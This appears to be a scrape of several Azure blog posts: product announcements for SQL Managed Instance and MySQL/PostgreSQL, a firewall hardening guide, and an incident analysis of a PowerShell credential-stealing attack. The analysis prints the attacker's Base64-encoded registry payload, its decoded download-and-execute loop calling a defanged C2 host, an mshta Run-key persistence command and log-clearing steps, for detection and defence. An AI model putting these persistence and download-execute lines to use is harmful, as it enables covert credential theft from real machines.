We understand our enterprise customers and their security concerns and are thus introducing VNET support with private IP addresses and VPN to on-premises networks to SQL Database Managed Instance, thus enabling full workload isolation. You can now get the benefits of the public cloud while keeping your environment isolated from the public Internet. Just as SQL Server has been the most secure database server for years, we’re doing the same in the cloud.

For organizations looking to migrate hundreds or thousands of SQL Server databases from on-premise or IaaS, self-built or ISV provided, with as low effort as possible, Managed Instance provides a simple, secure and economical path to modernization.

How SQL Database Managed Instance works

Managed Instance is built on the same infrastructure that’s been running millions of databases and billions of transactions daily in Azure SQL Database, over the last several years. The same mechanisms for automatic backups, high availability and security are used for Managed Instance. The key difference is that the new offering exposes entire SQL instances to customers, instead of individual databases. On the Managed Instance, all databases within the instance are located on the same SQL Server instance under the hood, just like on an on-premises SQL Server instance. This guarantees that all instance-scoped functionality will work the same way, such as global temp tables, cross-database queries, SQL Agent, etc. This database placement is kept through automatic failovers, and all server level objects, such as logins or SQL Agent logins, are properly replicated.

Multiple Managed Instances can be placed into a so-called virtual cluster, which can then be placed into the customer’s VNET, as a customer specified subnet, and sealed off from the public internet. The virtual clusters enable scenarios such as cross-instance queries (also known as linked servers), and Service Broker messaging between different instances. Both the virtual clusters and the instances within them are dedicated to a particular customer, and are isolated from other customers, which greatly helps relax some of the common public cloud concerns.

The easiest path to SQL Database Managed Instance

The new Azure Database Migration Service (ADMS) is an intelligent, fully managed, first party Azure service that enables seamless and frictionless migrations from heterogeneous database sources to Azure Database platforms with only a few minutes of downtime. This service will streamline the tasks required to move existing 3rd party and SQL Server databases to Azure.

Maximize your on-premises license investments

The Azure Hybrid Benefit for SQL Server is an Azure-based benefit that helps customers maximize the value of their current on-premises licensing investments to pay a discounted rate on SQL Database Managed Instance. If you are a SQL Server Enterprise Edition or Standard Edition customer and you have Software Assurance, the Azure Hybrid Benefit for SQL Server can help you save up to 30% on Managed Instance.

Making SQL Database the best and most economical destination for your data

Running your data estate on Azure SQL Database is like putting it on autopilot: we take care of the day to day tasks, so you can focus on advancing your business. Azure SQL Database, a fully-managed, intelligent relational database service, delivers predictable performance at multiple service levels that provide dynamic scalability with minimal or no downtime, built-in intelligent optimization, global scalability and availability, and advanced security options — all with near-zero administration. These capabilities allow you to focus on rapid app development and accelerating your time to market, rather than allocating precious time and resources to managing virtual machines and infrastructure. New migration services and benefits can accelerate your modernization to the cloud and further reduce your total cost of ownership, making Azure SQL Database the best and most economical place to run SQL Server workloads.

We are so excited that these previews are almost here and look forward to hearing from you and helping you accelerate your business goals, and drive great efficiencies and innovation across your organization.
Quelle: Azure

Hardening Azure Analysis Services with the new firewall capability

Azure Analysis Services (Azure AS) is designed with security in mind and takes advantage of the security features available on the Azure platform. For example, integration with Azure Active Directory (Azure AD) provides a solid foundation for access control. Any user creating, managing, or connecting to an Azure Analysis Services server must have a valid Azure AD user identity. Object-level security within a model enables you to define permissions at the table, row, and column levels. Moreover, Azure AS uses encryption to help safeguard data at rest and in transit within the local data center, across data centers, between data centers and on-premises networks, as well as across public Internet connections. The combination of Transport Layer Security (TLS), Perfect Forward Secrecy (PFS), and RSA-based 2,048-bit encryption keys provides strong protection against would-be eavesdroppers.

However, keeping in mind that Azure Analysis Services is a multi-tenant cloud service, it is important to note that the service accepts network traffic from any client by default. Do not forget to harden your servers by taking advantage of basic firewall support. In the Azure Portal, you can find the firewall settings when you display the properties of your Azure AS server. Click on the Firewall tab, as the following screenshot illustrates. You must be a member of the Analysis Services Admins group to configure the firewall.

Enabling the firewall without providing any client IP address ranges effectively closes the Azure AS server to all inbound traffic—except traffic from the Power BI cloud service. The Power BI service is whitelisted in the default "Firewall on" state, but you can disable this rule if desired. Click Save to apply the changes.

With the firewall enabled, the Azure AS server responds to blocked traffic with a 401 error code. The corresponding error message informs you about the IP address that the client was using. This can be helpful if you want to grant this IP address access to your Azure AS server. This error handling is different from a network firewall in stealth mode not responding to blocked traffic at all. Although the Azure AS firewall does not operate in stealth mode, it enables you to lock down your servers effectively. You can quickly verify the firewall behavior in SQL Server Management Studio (SSMS), as shown in the following screenshot.

You can also discover the client IP address of your workstation in the Azure Portal. On the Firewall page, click on Add client IP to add the current workstation IP address to the list of allowed IP addresses. Please note that the IP address is typically a public address, most likely assigned dynamically at your network access point to the Internet. Your client computer might not always use the same IP address. For this reason, it is usually advantageous to configure an IP range instead of an individual address. See the following table for examples. Note that you must specify addresses in IPv4 format.

Name

Start IP Address

End IP Address

Comments

ClientIPAddress

192.168.1.1

192.168.1.1

Grants access to exactly one IP address.

ClientIPAddresses

192.168.1.0

192.168.1.254

Grants access to all IP addresses in the 192.168.1.x subnet.

US East 2 Data Center

23.100.64.1

23.100.71.254

This is the address range 23.100.64.0/21 from the US East 2 data center.

Besides Power BI and client computers in on-premises networks, you might also want to grant specific Azure-based solutions access to your Azure AS server. For example, you could be using a solution based on Azure Functions to perform automated processing or other actions against Azure AS. If the Azure AS firewall blocks your solution, you will encounter the error message, “System.Net.WebException: The remote server returned an error: (401) Unauthorized.” The following screenshot illustrates the error condition.

In order to grant the Azure App Service access to your Azure AS server, you must determine the IP address that your function app uses. In the properties of your function app, copy the outbound IP addresses (see the following screenshot) and add them to the list of allowed client IP addresses in your firewall rules.

Perhaps you are wondering at this point how to open an Azure AS server to an entire data center. This is slightly more complicated because the Azure data center address ranges are dynamic. You can download an XML file with the list of IP address ranges for all Azure data centers from the Microsoft Download Center. This list is updated on a weekly basis, so make sure you check for updates periodically.

Note that the XML file uses the classless inter-domain routing (CIDR) notation, while the Azure AS Firewall settings expect the ranges to be specified with start and end IP address. To convert the CIDR format into start and end IP addresses, you can use any of the publicly available IP converter tools. Alternatively, you can process the XML file by using Power Query, as the following screenshot illustrates.

Download the Excel workbook and make sure you update the XmlFilePath parameter to point to the XML file you downloaded. For your convenience, the workbook includes a column called Firewall Rule Added, which concatenates the data center information into firewall rules as they would be defined in an Azure Resource Manager (ARM) template. The following screenshot shows an ARM template with several rules that grant IP address ranges from the US East 2 data center access to an Azure AS server.

The ARM template makes it easy to apply a large list of rules programmatically by using Azure PowerShell, Azure Command Line Interface (CLI), Azure portal, or the Resource Manager REST API. However, an excessively long list of IP addresses is hard to manage. Moreover, the Azure AS firewall must evaluate each rule for every incoming request. For this reason, it is recommended to limit the number of rules to the absolute necessary. For example, avoid adding approximately 3,500 rules for all IP ranges across all Azure data centers. Even if you limit the rules to your server’s local data center, there still may be more than 400 subnets. As a best practice, build your Azure AS business solutions using technologies that support static IP addresses, or at least a small set of dynamic IP addresses, as is the case with the Azure App Service. The smaller the surface area, the more effective the hardening of your Azure AS server.

Submit your own ideas for features on our feedback forum and learn more about Azure Analysis Services.
Quelle: Azure

How Azure Security Center unveils suspicious PowerShell attack

In honor of National Cybersecurity Awareness Month (NCSAM), we have a new post in our series highlighting real-world attacks that Azure Security Center helped detect, investigate, and mitigate. This post is about an attack which used PowerShell to run malicious code and collect user credentials. But before we jump in, here’s a recap of other blog posts in our series where Security Center detected a:

SQL Brute Force attack
Bitcoin mining attack
DDoS attack using cyber threat intelligence
Good applications being used maliciously

In this post, we’ll walk through another interesting real-world attack scenario which was detected by Azure Security Center and investigated by our team. Names of the affected company, all computer names, and all usernames have been changed to protect privacy. This particular attack employed the use of PowerShell to run malicious code in-memory with the goal of collecting credential information through password stealing, keystroke logging, clipboard scraping, and screen captures. We’ll map out the stages of the compromise which began with an RDP Force attack and resulted in the setup and configuration of persistent auto-starts (ASEP) in the registry. This case study provides insights into the dynamics of the attack and recommendations on how to detect and prevent similar attacks in your environment.

Initial Azure Security Center alert and details

As long as remote administration of internet connected computers has been around, hackers have continued their efforts to discover remote admin services like Remote Desktop Protocol (RDP) running so that they can crack passwords through brute force attacks. Our case begins in a large customer’s Azure Security Center console where they were alerted to RDP brute force activity as well as suspicious PowerShell activity.

In the Azure Security Center screenshot below, you can track the chronological progression from bottom to top as “Failed RDP Brute Force Attack” alerts are followed by a single “Successful RDP Brute Force Attack” alert – an indication that someone logged on via RDP after having guessed a user password. This malicious Brute Force logon is subsequently followed by several alerts for unusual PowerShell activity.

As we examine the initial Successful RDP Brute Force Attack alert, we see the time of the attack, the account that was compromised, the attacking IP address where the attempts originated from (Italy in our case), and a link to Microsoft’s Threat Intel “RDP Brute Forcing” report.

After the successful logon, as we drill down to the subsequent High severity alerts, Azure Security Center chronologically reveals each command lines launched by the attacker once they successfully logged on:

Initial compromise and details of attacker activity

Armed with the information provided by the alerts, our investigative team worked with the customer to examine Account logon logs (Event ID 4624) Process Creation logs (Event ID 4688) taken from the time the attacker initially logged on. From the earliest logon data, we see continual RDP brute force attempts using a variety of Username and Password combinations. Most of these failed attempts result in Event ID 4625 (An account failed to log on), with a Status code of 0xc000006d (The attempted logon is invalid), and a Substatus code of 0xc0000064 (The specified account does not exist).

Around 10:13am on 09-06 we begin to see a change in the Substatus code. We now see the use of username “ContosoAdmin” resulting in a different status code: 0xc000006a (Wrong password). This is followed by successful type 3 logon and type 10 (Remote Interactive) logon using the account “ContosoAdmin”. The logon appears to originate from an IP address in Italy (188.125.100.233).

Looking at Process Creation activity after the logon. The attacker first issues the “whoami” command, which displays who the current logged on user is. They then list the members of the “Domain Admins” group with the net group “Domain Admins” /domain command. This is followed by the “qwinsta” command which displays all Remote Desktop Services sessions. Taskmgr (Windows Task Manager) is then launched to view or manage Process and Services.

About a minute later, another PowerShell command is executed. This command is obfuscated with Base64 encoded strings which are additionally wrapped in a Deflate compression algorithm.

Note: We’ll be digging further into what this command does as we decode the Base64 later in this blog.

About 3 min later, the attacker logs off the machine. But before logging off, they attempt to clean up their tracks by clearing all event logs. This is done with the built-in wevtutil.exe (Windows Events Command Line Utility). First, all Event logs are enumerated with the “el” or “enum-logs” switch. Then all event logs are cleared with the “cl” or “clear-log” switch. Below is a portion of the event clearing commands launched by the attacker.

A closer look at the Base64 encoded PowerShell command

Decoding the encoded Base64 portion from the attacker’s initial command, turns up yet more Base64 encoded commands which reveal:

Nested Base64 obfuscation.
All levels of the command executions are obfuscated.
Created of a registry-only ASEP (Auto-Start Extensibility Point) as a persistence mechanism.
Malicious code parameters stored in registry.
Command execution occurs “in-memory” with no file or NTFS artifacts since the ASEP and the parameters are only in the System Registry.

Here’s the initial command issued by the attacker:

Decoding the Base64 reveals registry entries and more Base64 strings to decode…

Decoding these nested Base64 values, we determine that the command does the following:

The command first stores parameter information for subsequent commands to read from in the registry location named “SeCert” under HKLMSoftwareMicrosoftWindowsCurrentVersion.

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion]
"SeCert"="dwBoAGkAbABlACgAMQApAHsAdAByAHkAewBJAEUAWAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALg
BEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBkAG0AcwBlAHIAdgBlAHIAcwAuAGMAbwBtAC8AJwArACgAWwBjAGgAYQBy
AF0AKAA4ADUALQAoAC0AMwA3ACkAKQApACkAfQBjAGEAdABjAGgAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAfQB9AA=="

The Base64 value in the above registry key decodes to a download command from a malicious C2 (Command and Control) domain (mdmservers[.]com).

while(1){try{IEX(New-Object Net.WebClient).DownloadString('hxxp[:]//mdmservers[.]com/'+([char](85-(-37))))}catch{Start-Sleep -s 10}}

The attacker’s command then creates a persistence mechanism through a registry ASEP (Auto-start Extensibility Point) named ”SophosMSHTA“ under the “HKLMSoftwareMicrosoftWindowsCurrentVersionRun” key.

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"SophosMSHTA"="mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -c ""$x=$((gp HKLM:SoftwareMicrosoftWindowsCurrentVersion SeCert).SeCert);powershell -E $x""",0,True)(window.close)"

This registry persistence ensures that the malicious commands are launched every time the machine is started or restarted.
The registry ASEP launches the Microsoft Scripting Engine (mshta.exe).
Mshta.exe, in turn, runs PowerShell.exe which then reads and decodes the value of HKLMSOFTWAREMicrosoftWindowsCurrentVersion -> ”SeCert”.
The registry values of SeCert tells PowerShell to download and launch a malicious script from 'hxxp[:]//mdmservers[.]com’.

Malicious code downloaded and executed

Once the attacker has setup the persistence mechanism and has logged off, the next restart of the host machine launches PowerShell to download and launch a malicious payload from 'hxxp[:]//mdmservers[.]com'. This malicious script contains various sections which perform specific functions. The table below details the main functions of the malicious payload.

Actions

Scrapes content from the clipboard and saves output to the following location:

%temp%Applnsights_VisualStudio.txt

Captures all keystrokes to the following location:

%temp%key.log

Takes initial screen capture and saves a .jpg to the following location:

%temp%F28DD9-0677-4EAC-91B8-2112B1515341yyyymmdd_hhmmss.jpg

Takes subsequent screen captures when certain financial or account credential related key words are typed, and saves .jpg to the following location:

%temp%F28DD9-0677-4EAC-91B8-2112B1515341yyyymmdd_hhmmss.jpg

Checks if Google Chrome browser is installed. If so, collects all passwords from Chrome cache and saves to the following location:

%temp%Chrome.log

Checks if Mozilla Firefox browser is installed. If so, collects all passwords from Firefox cache and saves to the following location:

%temp%Firefox.log

Putting it all together

So, let’s summarize what we’ve seen so far in this investigation:

Initial ingress occurs when admin account is compromised in a successful RDP Brute Force attack.
The attacker then executes a Base64 obfuscated PowerShell command that sets up a registry ASEP which launches at boot time.
The attacker then clears evidence of their activity by deleting all event logs with the command:  wevtutil.exe -cl <eventlogname>.
When the affected host is started or rebooted, it launches the malicious registry ASEP at HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun
The registry ASEP launches the Microsoft Scripting Engine (mshta.exe).
Mshta.exe, in turn, runs PowerShell.exe which then reads and decodes the value of HKLMSOFTWAREMicrosoftWindowsCurrentVersion -> ”SeCert”
The registry values of “SeCert” tell PowerShell to download and launch a malicious script from 'hxxp[:]//mdmservers[.]com’
The malicious code from hxxp[:]//mdmservers[.]com then does the following:

Scrapes content from the clipboard to: %temp%Applnsights_VisualStudio.txt
Captures all keystrokes to: %temp%key.log
Takes initial screen capture and saves .jpg to: %temp%F28DD9-0677-4EAC-91B8-2112B1515341yyyymmdd_hhmmss.jpg
Takes subsequent screen captures when certain financial or account credential related key words are typed, and saves .jpg to the following location: %temp%F28DD9-0677-4EAC-91B8-2112B1515341yyyymmdd_hhmmss.jpg
Checks if Google Chrome browser is installed. If so, collect all passwords from Chrome cache and saves to: %temp%Chrome.log
Checks if Mozilla Firefox browser is installed. If so, collect all passwords from Firefox cache and saves to: %temp%Firefox.log

The result of this attack is an information stealing malware which automatically launches from the registry, runs in memory, and collects keystrokes, browser passwords, clipboard data, and screenshots.

How Azure Security Center caught it all

It is evident that the attacker went through extraordinary means to conceal their activity; ensuring all process executions used built-in Windows executables (PowerShell.exe, Mshta.exe, Wevtutil.exe), using command parameters that were obfuscated and stored in the registry, and deleting all event logs to clear their tracks. This effort, however, did not prevent Azure Security Center from detecting, collecting, and reporting this malicious activity.

As we saw at the beginning of this blog, Azure Security Center detected all stages of this attack, providing details of the initial RDP Brute Force attack and revealing all commands at various stages issued by the attacker. You’ll also notice in the Alerts, that all obfuscated commandlines were deciphered, decoded, and presented in clear text at each stage of the attack. This valuable and time saving information helps security response investigators and system administrators answer questions like “What happened?”, “When did this happen?”, “How did they get in?”, “What did they do when they got in?”, and “Where’d they come from?”.  Additionally, investigators can also determine if other hosts in their organization may have been compromised through lateral movement from this compromised host. Seeing the bigger picture of this attack can also help to answer motive questions like “what were they after?” In our case, primary purpose appears to be credential stealing with the goal of financial or intellectual gain.

In all of our investigations, Azure Security Center played a pivotal role in helping to determine critical details such as initial ingress/compromise vector, source of attack, possible lateral movement, and scope of the attack. Security Center also details artifacts that can be lost over time due to filesystem overwrites or log retention/storage limitations. Azure Security Center’s ability to ingest, store, analyze, and decipher data from various sources using the latest machine learning and big data analytics, make it invaluable to security analysts, incident responders, and forensic professionals alike.

Recommended remediation and mitigation steps

The initial compromise was the result of a successful RDP Brute force attack on a user account which had an easily guessed password. This resulted in the complete compromise of the affected host machine. In this case, the host was configured with a malicious PowerShell code with the primary purpose of credential stealing with the goal of financial or intellectual gain. Microsoft recommends investigating the source of the initial compromise via a review of available log sources, host-based analysis, and if needed, forensic analysis to help build a picture of the compromise. In the case of Azure Infrastructure as a Service (IaaS) and Virtual Machines (VMs), several features are present to facilitate the collection of data including the ability to attach data drives to a running machine and disk imaging capabilities. Microsoft also recommends performing a scan using malware protection software to help identify and remove any malicious software running on the host. If lateral movement has been identified from the compromised host, remediation actions should extend to these hosts.

For cases where the victim host cannot be confirmed clean, or a root cause of the compromise cannot be identified, Microsoft recommends backing up critical data and migrating to a new virtual machine. Additionally, new or remediated hosts should be hardened prior to being placed back on the network to prevent reinfection. However, with the understanding that this sometimes cannot be done immediately, we recommend implementing the following remediation/preventative steps:

Password Policy: Attackers usually launch brute-force attacks using widely available tools that utilize wordlists and smart rule sets to intelligently and automatically guess user passwords. So, the first step is to make sure to utilize complex passwords for all VMs. A complex password policy that enforces frequent password changes should be in place. Learn more about the best practices for enforcing password policies.
Endpoints: Endpoints allows communication with your VM from the Internet. When creating a VM in the Azure environment, two endpoints get created by default to help manage the VM, Remote Desktop and PowerShell. It is recommended to remove any endpoints that are not needed and to only add them when required. Should you have an endpoint open, it is recommended to change the public port that is used whenever possible. When creating a new Windows VM, by default the public port for Remote Desktop is set to “Auto” which means a random public port will get automatically generated for you. Get more information on how to set up endpoints on a classic Windows virtual machine in Azure.
Enable Network Security Group: Azure Security Center recommends that you enable a network security group (NSG), if it’s not already enabled. NSGs contain a list of Access Control List (ACL) rules that allow or deny network traffic to your VM instances in a Virtual Network. An endpoint ACL allows you to control which IP address, or CIDR subnet of addresses, you want to allow access over that management protocol. Learn more about how to filter network traffic with network security groups and enable Network Security Groups in Azure Security Center.
Using VPN for management: A VPN gateway is a type of virtual network gateway that sends encrypted traffic across a public connection to an on-premises location. You can also use VPN gateways to send encrypted traffic between Azure virtual networks over the Microsoft network. To send encrypted network traffic between your Azure virtual network and on-premises site, you must create a VPN gateway for your virtual network. Both Site to Site and Point to Site gateway connections allows us to completely remove public endpoints and connect directly to the Virtual Machine over secure VPN connection.
Network Level Authentication (NLA): NLA can be used on the host machine to allow only Remote Desktop session creation from domain authenticated users. Because NLA requires the connecting user to authenticate themselves before a session is established with the server, Brute Force, Dictionary Attacks and password guessing attacks are mitigated.
Just In Time (JIT) Network Access: Just in time virtual machine (VM) access in Azure Security Center can be used to help secure and lock down inbound traffic to your Azure VMs. JIT Network Access can be used reduce exposure to a brute force attacks by limiting the amount of time that a port is open and as a result reduce exposure to attacks while providing easy access to connect to VMs when needed. 

For a more information on the malicious script and its output, see the following:

A most interesting PowerShell trojan [PowerShell sample and Raw Paste data provided by @JohnLaTwC]
Windows Defender Malware Encyclopedia Entry: Spyware:PowerShell/Tripelog

Learn more about Azure Security Center, see the following:

Azure Security Center’s detection capabilities
Managing and responding to security alerts in Azure Security Center
Managing security recommendations in Azure Security Center
Security health monitoring in Azure Security Center
Monitoring partner solutions with Azure Security Center
Azure Security Center FAQ
Get the latest Azure security news and information by reading the Azure Security blog.

Quelle: Azure

Announcing Azure Database for MySQL and PostgreSQL availability in Canada and Brazil

We’re excited to announce the public preview of Azure Database for MySQL and Azure Database for PostgreSQL in Canada (Central and East) and Brazil (Brazil South) data centers. The availability of Azure Database for MySQL and PostgreSQL services in Canada and Brazil provides app developers the ability to choose from an even larger number of geographical regions and deploy their favorite database on Azure, without the complexity of managing and administering the databases.

The Azure Database for MySQL and PostgreSQL, built using the community editions of MySQL and PostgreSQL databases, offers built-in high availability, security, and scaling on the fly with minimal downtime. This is achieved with an inclusive pricing model that enables developers to simply focus on developing apps. In addition, you can seamlessly migrate your existing apps without any changes and continue using existing tools.

Learn more about Azure Database of PostgreSQL and Azure Database for MySQL, or just create a new database with MySQL or PostgreSQL.

You can also read the public preview launch blogs for MySQL and PostgreSQL.

Creating an Azure Database for MySQL in Canada or Brazil

To create a new MySQL database in one of the Canada or Brazil data centers, follow the create process, choosing a new logical server in one of the Canada data centers (Central or East Canada) or the Brazil (Brazil South) data center.

Creating an Azure Database for PostgreSQL in Canada or Brazil

To create a new PostgreSQL database in one of the Canada or Brazil data centers, follow the create process, choosing a new logical server in one of the Canada data centers (Central, or East Canada) or the Brazil (Brazil South) data center.

Solutions and samples

You can access sample PostgreSQL applications on GitHub, allowing you to deploy our sample Day Planner app, using node.js or Ruby on Rails, on your own Azure subscription with a backend PostgreSQL database. The Day Planner app is a sample application that can be used to manage your day-to-day engagements. The app marks engagements, displays routes between them, and showcases the distance and time required to reach the next engagement.

We also support deploying Azure Web Apps with a MySQL database backend as a template on GitHub.

Developers can accomplish seamless connectivity for our PostgreSQL and MySQL services using native tools that they are used to. Developers can also continue to develop using Python, node.js, Java, PHP, or any programming language of their choice. We support development with your favorite open source frameworks such as Djnago and Flask, among others. The service will work seamlessly. If you have a sample application that you would like to host on our GitHub repo, or even have suggestions and feedback about our sample applications, please feel free to submit a pull request and become a contributor on our repo. We love working with our community to provide ready-to-go applications for the community at large.

Feedback

As with all new feature releases, we would love to receive your feedback. Feel free to leave comments below. You can also engage with us directly through User Voice, PostgreSQL and MySQL, if you have suggestions on how we can further improve the service.

Sunil Kamath
Twitter: @kamathsun
Quelle: Azure